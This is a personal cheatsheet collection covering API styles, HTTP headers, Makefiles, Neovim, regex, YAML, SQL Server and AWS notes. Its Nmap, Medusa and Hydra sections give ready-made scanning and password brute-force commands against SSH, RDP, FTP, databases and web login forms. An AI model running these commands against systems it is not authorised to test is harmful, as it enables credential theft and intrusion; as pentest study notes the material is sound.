Summary

These are my notes, there are many like them, but these ones are mine.

Cheatsheets

API Architectural Styles

REST

Proposed in 2000, REST is the most widely used style. It is often used between front-end clients and back-end services. A RESTful API complies with 6 architectural constraints. The payload format can be JSON, XML, HTML, or plain text.

GraphQL

GraphQL was proposed in 2015 by Meta. It provides a schema and type system, which suits complex systems where the relationships between entities are graph-like. For example, GraphQL can retrieve user and order information in one call (see the sketch below), while REST would need multiple calls.

GraphQL is not a replacement for REST. It can be built upon existing REST services.
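
A minimal sketch of that single-call idea using Python's requests library; the endpoint URL, schema, and field names are illustrative assumptions, not a real API:

import requests

# Hypothetical GraphQL API exposing a user with nested orders
query = """
query ($id: ID!) {
  user(id: $id) {
    name
    orders { id total }
  }
}
"""

resp = requests.post(
    "https://api.example.com/graphql",                 # hypothetical endpoint
    json={"query": query, "variables": {"id": "42"}},
    timeout=10,
)
print(resp.json()["data"]["user"])                     # user + orders in one round trip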

WebSocket

WebSocket is a protocol that provides full-duplex communication over TCP. Clients establish WebSocket connections to receive real-time updates from the back-end services. Unlike REST, which always “pulls” data, WebSocket enables data to be “pushed”.
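
A rough sketch of the push model, assuming the third-party websockets package and a hypothetical wss:// endpoint:

import asyncio
import websockets   # third-party package: pip install websockets

async def listen(url="wss://example.com/updates"):     # hypothetical endpoint
    # One long-lived, full-duplex connection; the server pushes messages as they happen
    async with websockets.connect(url) as ws:
        async for message in ws:
            print("pushed from server:", message)

asyncio.run(listen())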

Webhook

Webhooks are usually used for third-party asynchronous API calls. For example, we might use Stripe or PayPal as payment channels and register a webhook for payment results. When the third-party payment service finishes, it notifies our payment service whether the payment succeeded or failed (a minimal receiver sketch follows). Webhook calls are usually part of the system’s state machine.
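
A minimal receiver sketch, assuming Flask; the route, payload fields, and provider format are hypothetical:

from flask import Flask, request   # assumes Flask is installed

app = Flask(__name__)

@app.route("/webhooks/payment", methods=["POST"])      # hypothetical callback URL
def payment_webhook():
    event = request.get_json(force=True)
    # Drive the order's state machine from the provider's asynchronous callback
    if event.get("status") == "succeeded":
        print("mark order paid:", event.get("order_id"))
    else:
        print("mark order failed:", event.get("order_id"))
    return "", 204   # acknowledge quickly; do heavy work asynchronously

if __name__ == "__main__":
    app.run(port=8080)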

gRPC

Released in 2016, gRPC is used for communication among microservices. The gRPC library handles encoding/decoding and data transmission.

SOAP

SOAP stands for Simple Object Access Protocol. Its payload is XML only, which makes it suitable for communication between internal systems.

CAP Theorem

CAP theorem states that it is impossible for a distributed system to provide more than two of these guarantees: consistency, availability, and partition tolerance.

  • Consistency
    • All clients see the same data at the same time from any node
  • Availability
    • The ability for a system to respond to requests from users at all times
  • Partition Tolerance
    • The ability for a system to continue operating even if there is a partition in the network

Standard HTTP Headers

| Header | Example | Description |
| --- | --- | --- |
| A-IM | A-IM: feed | Instance manipulations that are acceptable in the response. Defined in RFC 3229 |
| Accept | Accept: application/json | The media type/types acceptable |
| Accept-Charset | Accept-Charset: utf-8 | The charset acceptable |
| Accept-Encoding | Accept-Encoding: gzip, deflate | List of acceptable encodings |
| Accept-Language | Accept-Language: en-US | List of acceptable languages |
| Accept-Datetime | Accept-Datetime: Thu, 31 May 2007 20:35:00 GMT | Request a past version of the resource prior to the datetime passed |
| Access-Control-Request-Method | Access-Control-Request-Method: GET | Used in a CORS request |
| Access-Control-Request-Headers | Access-Control-Request-Headers: origin, x-requested-with, accept | Used in a CORS request |
| Authorization | Authorization: Basic 34i3j4iom2323== | HTTP basic authentication credentials |
| Cache-Control | Cache-Control: no-cache | Set the caching rules |
| Connection | Connection: keep-alive | Control options for the current connection. Accepts keep-alive and close. Deprecated in HTTP/2 |
| Content-Length | Content-Length: 348 | The length of the request body in bytes |
| Content-Type | Content-Type: application/x-www-form-urlencoded | The content type of the body of the request (used in POST and PUT requests) |
| Cookie | Cookie: name=value | See https://flaviocopes.com/cookies/ |
| Date | Date: Tue, 15 Nov 1994 08:12:31 GMT | The date and time that the request was sent |
| Expect | Expect: 100-continue | Typically used when sending a large request body. We expect the server to return a 100 Continue HTTP status if it can handle the request, or 417 Expectation Failed if not |
| Forwarded | Forwarded: for=192.0.2.60; proto=http; by=203.0.113.43 | Disclose original information of a client connecting to a web server through an HTTP proxy. Used for testing purposes only, as it discloses privacy-sensitive information |
| From | From: user@example.com | The email address of the user making the request. Meant to be used, for example, to indicate a contact email for bots |
| Host | Host: flaviocopes.com | The domain name of the server (used to determine the server with virtual hosting), and the TCP port number on which the server is listening. If the port is omitted, 80 is assumed. This is a mandatory HTTP request header |
| If-Match | If-Match: "737060cd8c284d8582d" | Given one (or more) ETags, the server should only send back the response if the current resource matches one of those ETags. Mainly used in PUT methods to update a resource only if it has not been modified since the user last updated it |
| If-Modified-Since | If-Modified-Since: Sat, 29 Oct 1994 19:43:31 GMT | Allows a 304 Not Modified response to be returned if the content is unchanged since that date |
| If-None-Match | If-None-Match: "737060cd882f209582d" | Allows a 304 Not Modified response to be returned if content is unchanged. Opposite of If-Match |
| If-Range | If-Range: "737060cd8c9582d" | Used to resume downloads; returns a partial if the condition is matched (ETag or date) or the full resource if not |
| If-Unmodified-Since | If-Unmodified-Since: Sat, 29 Oct 1994 19:43:31 GMT | Only send the response if the entity has not been modified since the specified time |
| Max-Forwards | Max-Forwards: 10 | Limit the number of times the message can be forwarded through proxies or gateways |
| Origin | Origin: http://mydomain.com | Send the current domain to perform a CORS request, used in an OPTIONS HTTP request (to ask the server for Access-Control- response headers) |
| Pragma | Pragma: no-cache | Used for backwards compatibility with HTTP/1.0 caches |
| Proxy-Authorization | Proxy-Authorization: Basic 2323jiojioIJOIOJIJ== | Authorization credentials for connecting to a proxy |
| Range | Range: bytes=500-999 | Request only a specific part of a resource |
| Referer | Referer: https://flaviocopes.com | The address of the previous web page from which a link to the currently requested page was followed |
| TE | TE: trailers, deflate | Specify the encodings the client can accept. Accepted values: compress, deflate, gzip, trailers. Only trailers is supported in HTTP/2 |
| User-Agent | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 | The string that identifies the user agent |
| Upgrade | Upgrade: h2c, HTTPS/1.3, IRC/6.9, RTA/x11, websocket | Ask the server to upgrade to another protocol. Deprecated in HTTP/2 |
| Via | Via: 1.0 fred, 1.1 example.com (Apache/1.1) | Informs the server of proxies through which the request was sent |
| Warning | Warning: 199 Miscellaneous warning | A general warning about possible problems with the status of the message. Accepts a special range of values |
| DNT | DNT: 1 | If enabled, asks servers to not track the user |
| X-CSRF-Token | X-CSRF-Token: | Used to prevent CSRF |
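
For illustration, a few of these request headers set with Python's requests library; the endpoint and token are placeholders:

import requests

resp = requests.get(
    "https://api.example.com/items",                   # placeholder endpoint
    headers={
        "Accept": "application/json",
        "Accept-Encoding": "gzip, deflate",
        "Authorization": "Bearer <token>",             # placeholder credential
        "If-None-Match": '"737060cd882f209582d"',      # conditional GET via ETag
    },
    timeout=10,
)
print(resp.status_code)   # 304 if the cached representation is still valid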

Latency Numbers Every SRE Should Know

1 nanosecond = 1/1,000,000,000 second
1 microsecond = 1/1,000,000 second
1 millisecond = 1/1,000 second

Sub-Nanosecond Range

  • Accessing CPU registers
  • CPU Clock Cycle

1-10 Nanosecond Range

  • L1/L2 cache
  • Branch Misprediction in CPU pipelining

10-100 Nanosecond Range

  • L3 cache
  • Apple M1 referencing main memory (RAM)

100-1000 Nanosecond Range

  • System call on Linux
  • MD5 hash a 64-bit number

1-10 Microsecond Range

  • Context switching between Linux threads

10-100 Microsecond Range

  • Process an HTTP request
  • Read 1 megabyte of sequential data from RAM
  • Read an 8K page from an SSD

100-1000 Microsecond Range

  • SSD write Latency
  • Intra-zone networking round trip in most cloud providers
  • Memcache/Redis get operation

1-10 Millisecond Range

  • Inter-zone networking latency
  • Seek time of an HDD

10-100 Millisecond Range

  • Network round trip between US-west and US-east coast
  • Read 1 gigabyte sequentially from main memory

100-1000 Millisecond Range

  • Some encryption/hashing algorithms
  • TLS handshake
  • Read 1 Gigabyte sequentially from an SSD

1 second+

  • Transfer 1GB over a cloud network within the same region

Makefiles

Why do Makefiles exist?

Makefiles are used for automation, typically as a step in the software development lifecycle (compilation, builds, etc.). However, they can be used for any other task that can be automated via the shell.

Makefiles must be indented using tabs, not spaces.

Makefile Syntax

Makefiles consist of a set of rules. Rules typically look like this:

targets: prerequisites
	command
	command
	command
  • The targets are file names, separated by spaces. Typically, there is only 1 per rule.
  • The commands are a series of steps typically used to make targets.
  • The prerequisites are also file names, separated by spaces. These files need to exist before the commands for the target are run. These are dependencies to the targets.

Example

Let’s start with a hello world example:

hello:
	echo "Hello, World"
	echo "This line will print if the file hello does not exist."

There’s already a lot to take in here. Let’s break it down:

  • We have one target called hello
  • This target has two commands
  • This target has no prerequisites

We’ll then run make hello. As long as the hello file does not exist, the commands will run. If hello does exist, no commands will run. It’s important to realize that I’m talking about hello as both a target and a file. That’s because the two are directly tied together. Typically, when a target is run (aka when the commands of a target are run), the commands will create a file with the same name as the target. In this case, the hello target does not create the hello file.

Let’s create a more typical Makefile - one that compiles a single C file. But before we do, make a file called blah.c that has the following contents:

// blah.c
int main() { return 0; }

Then create the Makefile (called Makefile, as always):

blah:
	cc blah.c -o blah

This time, try simply running make. Since there’s no target supplied as an argument to the make command, the first target is run. In this case, there’s only one target (blah). The first time you run this, blah will be created. The second time, you’ll see make: ‘blah’ is up to date. That’s because the blah file already exists. But there’s a problem: if we modify blah.c and then run make, nothing gets recompiled.

We solve this by adding a prerequisite:

blah: blah.c
	cc blah.c -o blah

When we run make again, the following set of steps happens:

  • The first target is selected, because the first target is the default target
  • This has a prerequisite of blah.c
  • Make decides if it should run the blah target. It will only run if blah doesn’t exist, or blah.c is newer than blah

This last step is critical, and is the essence of make. What it’s attempting to do is decide if the prerequisites of blah have changed since blah was last compiled. That is, if blah.c is modified, running make should recompile the file. And conversely, if blah.c has not changed, then it should not be recompiled.

To make this happen, it uses the filesystem timestamps as a proxy to determine if something has changed. This is a reasonable heuristic, because file timestamps typically will only change if the files are modified. But it’s important to realize that this isn’t always the case. You could, for example, modify a file, and then change the modified timestamp of that file to something old. If you did, Make would incorrectly guess that the file hadn’t changed and thus could be ignored.

Make Clean

clean is often used as a target that removes the output of other targets, but it is not a special word in Make. You can run make and make clean on the example below to create and delete some_file.

Note that clean is doing two new things here:

  • It’s a target that is not first (the default), and not a prerequisite. That means it’ll never run unless you explicitly call make clean
  • It’s not intended to be a filename. If you happen to have a file named clean, this target won’t run, which is not what we want. See .PHONY later in this tutorial on how to fix this
some_file: 
	touch some_file

clean:
	rm -f some_file

Variables

Variables can only be strings. You’ll typically want to use :=, but = also works.

Here’s an example of using variables:

files := file1 file2
some_file: $(files)
	echo "Look at this variable: " $(files)
	touch some_file

file1:
	touch file1
file2:
	touch file2

clean:
	rm -f file1 file2 some_file

Targets

The ‘all’ target

Making multiple targets and you want all of them to run? Make an all target. Since this is the first rule listed, it will run by default if make is called without specifying a target.

all: one two three

one:
	touch one
two:
	touch two
three:
	touch three

clean:
	rm -f one two three

Multiple targets

When there are multiple targets for a rule, the commands will be run for each target. $@ is an automatic variable that contains the target name.

all: f1.o f2.o

f1.o f2.o:
	echo $@
# Equivalent to:
# f1.o:
#	 echo f1.o
# f2.o:
#	 echo f2.o

Reference

Var assignment

foo  = "bar"
bar  = $(foo) foo  # dynamic (renewing) assignment
foo := "boo"       # one time assignment, $(bar) now is "boo foo"
foo ?= /usr/local  # safe assignment, $(foo) and $(bar) still the same
bar += world       # append, "boo foo world"
foo != echo fooo   # exec shell command and assign to foo
# $(bar) now is "fooo foo world"

= expressions are only evaluated when they’re being used.

Magic variables

out.o: src.c src.h
  $@   # "out.o" (target)
  $<   # "src.c" (first prerequisite)
  $^   # "src.c src.h" (all prerequisites)

%.o: %.c
  $*   # the 'stem' with which an implicit rule matches ("foo" in "foo.c")

also:
  $+   # prerequisites (all, with duplication)
  $?   # prerequisites (new ones)
  $|   # order-only prerequisites

  $(@D) # target directory

Command prefixes

| Prefix | Description |
| --- | --- |
| `-` | Ignore errors |
| `@` | Don’t print command |
| `+` | Run even if Make is in ‘don’t execute’ mode |
build:
    @echo "compiling"
    -gcc $< $@

-include .depend

Find files

js_files  := $(wildcard test/*.js)
all_files := $(shell find images -name "*")

Substitutions

file     = $(SOURCE:.cpp=.o)   # foo.cpp => foo.o
outputs  = $(files:src/%.coffee=lib/%.js)

outputs  = $(patsubst %.c, %.o, $(wildcard *.c))
assets   = $(patsubst images/%, assets/%, $(wildcard images/*))

More functions

$(strip $(string_var))

$(filter %.less, $(files))
$(filter-out %.less, $(files))

Building files

%.o: %.c
  ffmpeg -i $< > $@   # Input and output
  foo $^

Includes

-include foo.make

Options

make
  -e, --environment-overrides
  -B, --always-make
  -s, --silent
  -j, --jobs=N   # parallel processing

Conditionals

foo: $(objects)
ifeq ($(CC),gcc)
  $(CC) -o foo $(objects) $(libs_for_gcc)
else
  $(CC) -o foo $(objects) $(normal_libs)
endif

Recursive

deploy:
  $(MAKE) deploy2

Neovim Cheatsheet

Mode Switching:

  • i: Insert mode before cursor
  • I: Insert mode at the beginning of line
  • a: Insert mode after cursor
  • A: Insert mode at the end of line
  • v: Visual mode
  • V: Visual line mode
  • ^V (Ctrl + V): Visual block mode
  • :q: Quit (add ! to force)
  • :w: Save/write
  • :wq or ZZ: Save and Quit

Cursor Movement:

  • h: Left
  • j: Down
  • k: Up
  • l: Right
  • w: Jump by start of words
  • e: Jump to end of words
  • b: Jump backward by words
  • 0: Start of line
  • $: End of line
  • G: Go to last line of document
  • gg: Go to first line of document
  • ^: First non-blank character of line
  • : followed by a number: Go to that line number (e.g., :10)

Editing:

  • u: Undo
  • ^R (Ctrl + R): Redo
  • yy or Y: Yank/copy line
  • dd: Delete line
  • D: Delete from cursor to end of line
  • x: Delete character under cursor
  • p: Paste after cursor
  • P: Paste before cursor
  • r followed by a character: Replace character under cursor with the new character
  • cw: Change word

Search and Replace:

  • / followed by a term: Search for term (press n to go to next and N for previous)
  • :%s/old/new/g: Replace all occurrences of “old” with “new” in the entire file

Windows & Tabs:

  • ^W (Ctrl + W) followed by h/j/k/l: Move cursor to another window
  • :split or :sp: Split window horizontally
  • :vsplit or :vsp: Split window vertically
  • :tabnew or :tabn: Create a new tab
  • gt: Move to next tab
  • gT: Move to previous tab

Others:

  • .: Repeat last command
  • *: Search for word under cursor
  • #: Search for word under cursor, backwards
  • ~: Switch case of character under cursor
  • o: Insert new line below and enter insert mode
  • O: Insert new line above and enter insert mode
  • >>: Indent line
  • <<: Dedent line

Nmap Cheatsheet

Basic Scan Types

| Scan | Command | Purpose |
| --- | --- | --- |
| Ping Scan | nmap -sn <target> | Check if host is up. |
| SYN Scan | nmap -sS <target> | Stealthy fast TCP scan. |
| Service Version Scan | nmap -sV <target> | Scan service version of open ports. |
| Connect Scan | nmap -sT <target> | Full TCP handshake; accurate but noisy. |
| UDP Scan | nmap -sU <target> | Scan UDP ports (slow). |
| Version Scan | nmap -sV <target> | Identify service versions. |
| OS Detection | nmap -O <target> | Guess OS. |
| Aggressive Scan | nmap -A <target> | OS, version, scripts, traceroute. |

Port Selection

| Option | Meaning |
| --- | --- |
| -p 22 | Scan one port |
| -p 22,80,443 | Scan list |
| -p 1-65535 | Scan range |
| -p- | Scan all ports |
| --top-ports=10 | Scan most common ports |
| -F | Fast scan (top 100) |

Important Flags

| Flag | Description |
| --- | --- |
| -Pn | No host discovery; treat host as up |
| -n | No DNS resolution |
| --disable-arp-ping | Disable ARP ping |
| --packet-trace | Show all sent/received packets |
| --reason | Explain port states |
| -T4 | Faster timing template |
| --stats-every=5s | Show stats every 5 seconds |

Port States

| State | Meaning |
| --- | --- |
| open | Accepts connections |
| closed | Responds with RST |
| filtered | Blocked by firewall |
| unfiltered | Reachable, state unknown |
| open\|filtered | No response |
| closed\|filtered | Idle scan ambiguity |

Useful Examples

Scan Top 10 TCP Ports

nmap --top-ports=10 <target>

Full TCP + UDP + Version + OS

nmap -sS -sU -sV -O <target>

Packet Trace Example

nmap -p 21 --packet-trace -Pn -n --disable-arp-ping <target>

Service Enumeration

nmap -sV -p <port> <target>

Medusa Cheatsheet

Medusa is a fast, massively parallel, and modular login brute-forcer designed to support a wide array of services that allow remote authentication.

Installation

sudo apt-get -y update
sudo apt-get -y install medusa

Command Syntax

medusa [target_options] [credential_options] -M module [module_options]

Parameters

| Parameter | Explanation | Usage Example |
| --- | --- | --- |
| -h HOST | Target: Single hostname or IP address | medusa -h 192.168.1.10 ... |
| -H FILE | Target: File containing list of targets | medusa -H targets.txt ... |
| -u USERNAME | Username: Single username | medusa -u admin ... |
| -U FILE | Username: File containing usernames | medusa -U usernames.txt ... |
| -p PASSWORD | Password: Single password | medusa -p password123 ... |
| -P FILE | Password: File containing passwords | medusa -P passwords.txt ... |
| -M MODULE | Module: Specific module to use | medusa -M ssh ... |
| -m "OPTION" | Module options: Additional parameters for module | medusa -M http -m "POST /login.php..." |
| -t TASKS | Tasks: Number of parallel login attempts | medusa -t 4 ... |
| -f | Fast mode: Stop after first success on current host | medusa -f ... |
| -F | Fast mode: Stop after first success on any host | medusa -F ... |
| -n PORT | Port: Specify non-default port | medusa -n 2222 ... |
| -v LEVEL | Verbose: Detailed output (0-6) | medusa -v 4 ... |
| -e ns | Empty/Default: Check empty (n) and same as username (s) | medusa -e ns ... |

Modules

| Module | Service/Protocol | Description | Usage Example |
| --- | --- | --- | --- |
| ftp | File Transfer Protocol | Brute-force FTP login credentials | medusa -M ftp -h 192.168.1.100 -u admin -P passwords.txt |
| http | Hypertext Transfer Protocol | Brute-force HTTP login forms (GET/POST) | medusa -M http -h www.example.com -U users.txt -P passwords.txt -m DIR:/login.php -m FORM:username=^USER^&password=^PASS^ |
| imap | Internet Message Access Protocol | Brute-force IMAP logins for email servers | medusa -M imap -h mail.example.com -U users.txt -P passwords.txt |
| mysql | MySQL Database | Brute-force MySQL database credentials | medusa -M mysql -h 192.168.1.100 -u root -P passwords.txt |
| pop3 | Post Office Protocol 3 | Brute-force POP3 logins for email retrieval | medusa -M pop3 -h mail.example.com -U users.txt -P passwords.txt |
| rdp | Remote Desktop Protocol | Brute-force RDP logins for Windows remote desktop | medusa -M rdp -h 192.168.1.100 -u admin -P passwords.txt |
| ssh | Secure Shell (SSH) | Brute-force SSH logins for secure remote access | medusa -M ssh -h 192.168.1.100 -u root -P passwords.txt |
| svn | Subversion (SVN) | Brute-force Subversion repositories | medusa -M svn -h 192.168.1.100 -u admin -P passwords.txt |
| telnet | Telnet Protocol | Brute-force Telnet services | medusa -M telnet -h 192.168.1.100 -u admin -P passwords.txt |
| vnc | Virtual Network Computing | Brute-force VNC login credentials | medusa -M vnc -h 192.168.1.100 -P passwords.txt |
| web-form | Web Login Forms | Brute-force login forms using HTTP POST | medusa -M web-form -h www.example.com -U users.txt -P passwords.txt -m FORM:"username=^USER^&password=^PASS^:F=Invalid" |

Useful Examples

SSH Brute-Force Attack

medusa -h 192.168.0.100 -U usernames.txt -P passwords.txt -M ssh

Multiple Web Servers with Basic HTTP Authentication

medusa -H web_servers.txt -U usernames.txt -P passwords.txt -M http -m GET

Test for Empty or Default Passwords

medusa -h 10.0.0.5 -U usernames.txt -e ns -M ssh

HTTP POST Form Attack

medusa -M http -h www.example.com -U users.txt -P passwords.txt -m "POST /login.php HTTP/1.1\r\nContent-Length: 30\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nusername=^USER^&password=^PASS^"

Fast Mode (Stop on First Success)

medusa -h 192.168.1.100 -U usernames.txt -P passwords.txt -M ssh -f

Custom Port SSH Attack

medusa -h 192.168.1.100 -n 2222 -U usernames.txt -P passwords.txt -M ssh

Verbose Output

medusa -h 192.168.1.100 -U usernames.txt -P passwords.txt -M ssh -v 4

Parallel Tasks

medusa -h 192.168.1.100 -U usernames.txt -P passwords.txt -M ssh -t 8

Hydra Cheatsheet

Basic Syntax

hydra [login_options] [password_options] [attack_options] [service_options] service://server

Login Options

| Option | Description | Example |
| --- | --- | --- |
| -l LOGIN | Single username | hydra -l admin ... |
| -L FILE | Username list file | hydra -L usernames.txt ... |

Password Options

| Option | Description | Example |
| --- | --- | --- |
| -p PASS | Single password | hydra -p password123 ... |
| -P FILE | Password list file | hydra -P passwords.txt ... |
| -x MIN:MAX:CHARSET | Generate passwords | hydra -x 6:8:aA1 ... |

Attack Options

| Option | Description | Example |
| --- | --- | --- |
| -t TASKS | Number of parallel tasks (threads) | hydra -t 4 ... |
| -f | Stop after first successful login | hydra -f ... |
| -s PORT | Specify non-default port | hydra -s 2222 ... |
| -v | Verbose output | hydra -v ... |
| -V | Very verbose output | hydra -V ... |

Common Services

| Service | Protocol | Description | Example |
| --- | --- | --- | --- |
| ftp | FTP | File Transfer Protocol | hydra -l admin -P passwords.txt ftp://192.168.1.100 |
| ssh | SSH | Secure Shell | hydra -l root -P passwords.txt ssh://192.168.1.100 |
| http-get | HTTP GET | Web login (GET) | hydra -l admin -P passwords.txt http-get://example.com/login |
| http-post | HTTP POST | Web login (POST) | hydra -l admin -P passwords.txt http-post-form "/login.php:user=^USER^&pass=^PASS^:F=incorrect" |
| smtp | SMTP | Email sending | hydra -l admin -P passwords.txt smtp://mail.server.com |
| pop3 | POP3 | Email retrieval | hydra -l user@example.com -P passwords.txt pop3://mail.server.com |
| imap | IMAP | Remote email access | hydra -l user@example.com -P passwords.txt imap://mail.server.com |
| rdp | RDP | Remote Desktop Protocol | hydra -l administrator -P passwords.txt rdp://192.168.1.100 |
| telnet | Telnet | Remote terminal | hydra -l admin -P passwords.txt telnet://192.168.1.100 |
| mysql | MySQL | Database | hydra -l root -P passwords.txt mysql://192.168.1.100 |
| postgres | PostgreSQL | Database | hydra -l postgres -P passwords.txt postgres://192.168.1.100 |

Useful Examples

SSH Brute Force

hydra -l root -P /path/to/passwords.txt -t 4 ssh://192.168.1.100

FTP Brute Force

hydra -L usernames.txt -P passwords.txt ftp://192.168.1.100

HTTP POST Form Attack

hydra -l admin -P passwords.txt http-post-form "/login.php:user=^USER^&pass=^PASS^:F=incorrect" 192.168.1.100

RDP with Password Generation

hydra -l administrator -x 6:8:aA1 rdp://192.168.1.100

SSH on Non-Default Port

hydra -l admin -P passwords.txt -s 2222 ssh://192.168.1.100

Stop After First Success

hydra -l admin -P passwords.txt -f ssh://192.168.1.100

Verbose Output

hydra -l admin -P passwords.txt -v ssh://192.168.1.100

RDP with Custom Character Set

hydra -l administrator -x 6:8:abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 rdp://192.168.1.100

Ranger Cheatsheet

General

| Shortcut | Description |
| --- | --- |
| ranger | Start Ranger |
| Q | Quit Ranger |
| R | Reload current directory |
| ? | Ranger manpages / shortcuts |

Movement

| Shortcut | Description |
| --- | --- |
| k | Up |
| j | Down |
| h | Parent directory |
| l | Subdirectory |
| gg | Go to top of list |
| G | Go to bottom of list |
| J | Half page down |
| K | Half page up |
| H | History back |
| L | History forward |
| ~ | Switch the view |

File Operations

| Shortcut | Description |
| --- | --- |
| <Enter> | Open |
| r | Open file with |
| z | Toggle settings |
| o | Change sort order |
| zh | View hidden files |
| cw | Rename current file |
| yy | Yank / copy |
| dd | Cut |
| pp | Paste |
| / | Search for files (:search) |
| n | Next match |
| N | Previous match |
| <delete> | Delete |

Commands

| Shortcut | Description |
| --- | --- |
| : | Execute Ranger command |
| ! | Execute shell command |
| chmod | Change file permissions |
| du | Disk usage of current directory |
| S | Run the terminal in your current ranger window (exit to go back to ranger) |

Tabs

| Shortcut | Description |
| --- | --- |
| C-n | Create new tab |
| C-w | Close current tab |
| tab | Next tab |
| shift + tab | Previous tab |
| alt + [n] | Go to / create tab [n] |

File substituting

| Shortcut | Description |
| --- | --- |
| %f | Substitute highlighted file |
| %d | Substitute current directory |
| %s | Substitute currently selected files |
| %t | Substitute currently tagged files |

Example for substitution

:bulkrename %s

Marker

| Shortcut | Description |
| --- | --- |
| m + <letter> | Create marker |
| um + <letter> | Delete marker |
| ' + <letter> | Go to marker |
| t | Tag a file with an * |
| t"<any> | Tag a file with your desired mark |


Regex Cheatsheet

Regular expressions (regex) are patterns used for string matching and manipulation. Here’s a quick reference guide for common regex syntax:

Basics

  • .: Matches any character except a newline.
  • ^: Matches the start of a string or line.
  • $: Matches the end of a string or line.

Character Classes

  • [abc]: Matches any character a, b, or c.
  • [^abc]: Matches any character except a, b, or c.
  • [a-z]: Matches any lowercase letter.
  • [A-Z]: Matches any uppercase letter.
  • [0-9]: Matches any digit.
  • [a-zA-Z0-9]: Matches any alphanumeric character.
  • \d: Matches any digit (short for [0-9]).
  • \w: Matches any word character (alphanumeric + underscore).
  • \s: Matches any whitespace character (space, tab, newline).

Quantifiers

  • *: Matches the preceding element zero or more times.
  • +: Matches the preceding element one or more times.
  • ?: Matches the preceding element zero or one time.
  • {n}: Matches the preceding element exactly n times.
  • {n,}: Matches the preceding element n or more times.
  • {n,m}: Matches the preceding element between n and m times.

Groups and Alternation

  • (abc): Matches the group abc and captures it.
  • (?:abc): Matches the group abc without capturing it.
  • a|b: Matches either a or b.

Anchors

  • \b: Matches a word boundary.
  • \B: Matches a position that is not a word boundary.
  • (?=...): Positive lookahead assertion.
  • (?!...): Negative lookahead assertion.

Escaping Special Characters

  • \\: Escapes a special character (e.g., \\. matches a literal period).

Flags (Depends on Language)

  • i: Case-insensitive matching.
  • g: Global match (find all occurrences).
  • m: Multiline mode (^ and $ match the start/end of each line).
  • s: Dot matches all, including newlines.
  • u: Unicode mode; treat the pattern as a sequence of Unicode code points.
  • x: Ignore whitespace and allow comments.

Examples

  • /\d{3}-\d{2}-\d{4}/: Matches a standard US social security number.
  • /^[A-Za-z]+$/: Matches a string containing only letters.
  • /https?:\/\/(www\.)?\w+\.\w+/: Matches URLs starting with http:// or https://.
  • /(\d+)\s?-\s?\1/: Matches repeated numbers separated by a hyphen.
  • ^(\/[^\/?]+)(\/[^\/?]+)?(\/[^\/?]+)?: Match all text up to the 3rd ‘/’ in a URL
  • ^[a-z][a-z0-9+\-.]*://([a-z0-9\-._~%!$&'()*+,;=]+@)?([a-z0-9\-._~%]+|\[[a-z0-9\-._~%!$&'()*+,;=:]+\]): extract hostname from URL
  • ^https?:\/\/(.*)(\/[^\/?]+)(\/[^\/?]+)?(\/[^\/?]+)?: Match protocol (http/s), hostname, and path (3 forward slashes)
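
A few of the patterns above, exercised with Python's re module:

import re

ssn = re.compile(r"\d{3}-\d{2}-\d{4}")
print(bool(ssn.fullmatch("123-45-6789")))             # True

url = re.compile(r"https?://(www\.)?\w+\.\w+")
print(bool(url.match("https://www.example.com")))     # True

repeated = re.compile(r"(\d+)\s?-\s?\1")
print(bool(repeated.search("42 - 42")))               # True (backreference \1)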

https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_expressions/Cheatsheet

SQL Cheat Sheet

Who has a role:

 select @@ServerName [Server Name], DB_NAME() [DB Name], u.name [DB Role], u2.name [Member Name]
    from sys.database_role_members m
    join sys.database_principals u on m.role_principal_id = u.principal_id
    join sys.database_principals u2 on m.member_principal_id = u2.principal_id
    where u.name = 'db_owner'
    order by [Member Name]

Who logged in as dbo:

-- in the user database, run:
SELECT name, sid FROM sys.sysusers WHERE name = 'dbo';
-- in the master database, run:
SELECT name, sid FROM sys.sql_logins;

YAML Multi-line Strings

There are 9 (or 63*, depending how you count) different ways to write multi-line strings in YAML.

  • Use > most of the time: interior line breaks are stripped out, although you get one at the end:

      key: >
        Your long
        string here.
    
  • Use | if you want those linebreaks to be preserved as \n (for instance, embedded markdown with paragraphs):

      key: |
        ### Heading

        * Bullet
        * Points
    
  • Use >- or |- instead if you don’t want a linebreak appended at the end.

  • Use “…” if you need to split lines in the middle of words or want to literally type linebreaks as \n:

     key: "Hello\
     World!\n\nGet on it."
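
A quick way to check these behaviors, assuming PyYAML is installed:

import yaml   # assumes PyYAML: pip install pyyaml

doc = """
folded: >
  one
  two
literal: |
  one
  two
folded_strip: >-
  one
  two
"""

print(yaml.safe_load(doc))
# {'folded': 'one two\n', 'literal': 'one\ntwo\n', 'folded_strip': 'one two'}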
    

Clouds

Notes related to various cloud service providers.

AWS

Notes related to Amazon Web Services (AWS).

DVA-C02-notes

Elastic Beanstalk

Introduction

  • Developer centric view of deploying an application on AWS
  • Simplifies deploying EC2, ASG, ELB, RDS, etc.
  • Fully managed by AWS

Beanstalk Components

  • Application: A collection of Beanstalk components
  • Application Version: an iteration of your application
  • Environment:
    • collection of AWS resources running an application version
    • Tiers: web server environment and worker environment
    • You can create multiple environments (dev, prod, QA, etc.)

Supported Platforms

  • Multiple languages supported: Go, Python, Java, .NET, Node, PHP, Ruby, Packer Builder
  • Supports single container docker, multi-container docker, etc.

Deployment Modes

  • Single Instance
    • One EC2 instance
    • Great for dev environments
  • HA with Load Balancer
    • Multiple EC2 instances in ASG
    • Great for prod

Deployment Options

  • All at once
    • fastest, but instances aren’t available to service traffic for a bit (downtime)
  • Rolling
    • A few instances at a time are taken offline and updated
  • Rolling with additional batches
    • Like rolling, but spins up new instances to move the batch
  • Immutable
    • Spins up new instances in a new ASG, deploys the new version to these instances, and then swaps all the instances once the new ones are healthy
  • Blue/Green
    • Create a new environment and switch over when ready
  • Traffic Splitting
    • Like canary testing

Beanstalk Lifecycle Policy

  • Beanstalk can store at most 1000 application versions
  • Versions currently in use cannot be deleted

CloudFormation

Introduction

  • Declarative language for deploying resources in AWS
  • YAML or JSON
  • CloudFormation templates can be visualized using Application Composer

Example

---
Resources:
  MyInstance:
    Type: AWS::EC2::Instance
    Properties:
      AvailabilityZone: us-east-1a
      ImageId: ami-0a3c3a20c09d6f377
      InstanceType: t2.micro

CloudFormation Template Sections

  • Resources

